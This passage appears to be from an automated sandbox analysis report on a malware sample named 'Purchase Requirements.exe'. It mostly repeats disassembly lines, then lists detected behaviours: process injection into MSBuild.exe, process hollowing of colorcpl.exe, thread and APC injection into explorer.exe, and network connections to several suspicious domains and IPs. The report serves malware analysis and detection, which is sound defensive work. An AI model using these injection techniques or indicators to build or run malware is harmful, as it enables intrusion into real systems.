          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01428EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0149FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0147FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04453D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04493540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04437D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04434120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0449A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0445927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04448E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04428A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04433A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04458EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04443B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04443B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0443F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04421B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04421B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04428794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Purchase Requirements.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.mariasmoworldwide.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.129 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.thefitflect.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.85.227 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.212 80
          Source: C:\Windows\explorer.exeDomain query: www.goldenstatelabradoodles.com
          Source: C:\Windows\explorer.exeDomain query: www.narrowpathwc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.braun-mathematik.online
          Source: C:\Windows\explorer.exeDomain query: www.mynjelderlaw.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Purchase Requirements.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3424
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 60000
          Writes to foreign memory regionsShow sources
